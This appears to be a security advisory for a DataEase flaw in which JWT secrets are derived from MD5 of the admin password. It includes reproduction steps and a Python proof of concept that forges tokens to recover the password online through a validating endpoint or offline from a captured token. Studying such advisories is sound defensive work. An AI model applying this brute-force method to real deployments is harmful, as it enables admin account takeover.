DataEase Brute-Force Vulnerability in JWT Secret Derivation Allows Admin Password Recovery

Vulnerability

DataEase versions prior to 2.10.19 derive the JWT signing secret from the MD5 hash of the user's password instead of from a random, high-entropy key. Because the secret is a deterministic function of the password, a token is only as hard to forge as the password is to guess: an attacker who can submit tokens to an API endpoint that validates signatures without rate limiting or alerting can sign a token with MD5(candidate password) for each guess and use the endpoint's accept/reject response as an oracle. The first guess that is accepted is the admin's password, which yields full account takeover.

Impact

Exploitation of this vulnerability could lead to unauthorized access to the admin account, allowing the attacker to take over the application.

Reproduction

To reproduce this vulnerability:

1. Set the admin password to a value you know and compute its MD5 hash.
2. Log in as admin and inspect the issued JWT. Recompute the HMAC over the token's header.payload using the MD5 hash as the key and confirm it equals the token's signature; this shows the secret is derived from the password.
3. Identify an API endpoint that accepts a JWT and validates its signature without rate limiting or alerting (an unmonitored endpoint).
4. For each candidate password, sign a token with MD5(candidate) as the secret and submit it to that endpoint. The candidate whose token is accepted is the admin password.

The cost of the search is bounded by the guessability of the admin password, not by the JWT key length. If the attacker already holds any token issued to the admin, the same search can be run entirely offline against the captured signature, without touching the server.
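The following Python block is an added example, not DataEase code, illustrating the mechanism described in the Vulnerability section and the reproduction steps above: a secret derived as MD5(password), HS256 tokens signed with it, a simulated token-validating endpoint used as an oracle, the offline variant against a captured token, and a random-key derivation for contrast. The exact key derivation (hex MD5 digest used as the HMAC key), the HS256 algorithm, and the claim names are assumptions; the wordlist and admin password are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed wordlist for the demonstration; a real attack would use a password list.
WORDLIST = ["123456", "password", "admin123", "DataEase@2024", "S3cure!pass"]


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def vulnerable_secret(password: str) -> bytes:
    """Secret derived from the password (assumption: hex MD5 digest used as the HMAC key).
    The key has exactly the entropy of the password, so it is as guessable as the password."""
    return hashlib.md5(password.encode()).hexdigest().encode()


def hardened_secret() -> bytes:
    """Per-deployment random 256-bit key: unrelated to any password, not brute-forceable."""
    return secrets.token_bytes(32)


def sign_jwt(claims: dict, secret: bytes) -> str:
    """Minimal HS256 JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    signature = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(signature)}"


def verify_jwt(token: str, secret: bytes) -> bool:
    """Server-side check: recompute the HMAC over header.payload and compare in constant time."""
    parts = token.split(".")
    if len(parts) != 3:
        return False
    header, payload, signature = parts
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    try:
        return hmac.compare_digest(expected, b64url_decode(signature))
    except (ValueError, TypeError):
        return False


def token_uses_password_secret(token: str, known_password: str) -> bool:
    """Reproduction step 2: does a token issued to the admin verify under MD5(known password)?"""
    return verify_jwt(token, vulnerable_secret(known_password))


def brute_force_online(validate, claims: dict, wordlist):
    """Reproduction step 4: forge one token per candidate password and let the
    signature-validating endpoint act as the oracle. Returns (password or None, requests sent)."""
    for attempts, candidate in enumerate(wordlist, start=1):
        if validate(sign_jwt(claims, vulnerable_secret(candidate))):
            return candidate, attempts
    return None, len(wordlist)


def brute_force_offline(captured_token: str, wordlist):
    """Offline variant: any captured admin token lets the attacker test candidates locally."""
    for candidate in wordlist:
        if token_uses_password_secret(captured_token, candidate):
            return candidate
    return None


def demo() -> dict:
    admin_password = "DataEase@2024"             # constructed; in the repro you choose this yourself
    claims = {"userId": 1, "username": "admin"}  # assumed claim names, not DataEase's actual ones

    # Vulnerable deployment: the signing secret is a function of the admin password.
    weak_secret = vulnerable_secret(admin_password)
    issued = sign_jwt(claims, weak_secret)
    weak_endpoint = lambda tok: verify_jwt(tok, weak_secret)      # simulated unmonitored endpoint

    # Hardened deployment: random key, identical endpoint logic.
    strong_secret = hardened_secret()
    strong_endpoint = lambda tok: verify_jwt(tok, strong_secret)

    return {
        "signed_with_md5_of_password": token_uses_password_secret(issued, admin_password),
        "online_recovery": brute_force_online(weak_endpoint, claims, WORDLIST),
        "offline_recovery": brute_force_offline(issued, WORDLIST),
        "online_against_random_key": brute_force_online(strong_endpoint, claims, WORDLIST),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Against the password-derived secret the online search recovers the admin password on the fourth request and the offline search recovers it from the captured token alone; against the random key the same wordlist exhausts without a hit, which is the property the fix must restore.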

Remediation

Users are advised to upgrade to DataEase version 2.10.19 or later.

Added: Jan 22, 2026, 2:29 AM
Updated: Jan 22, 2026, 2:29 AM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 7.5
exploitability: 6.0
remediation: 7.7
relevance: 2.3
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.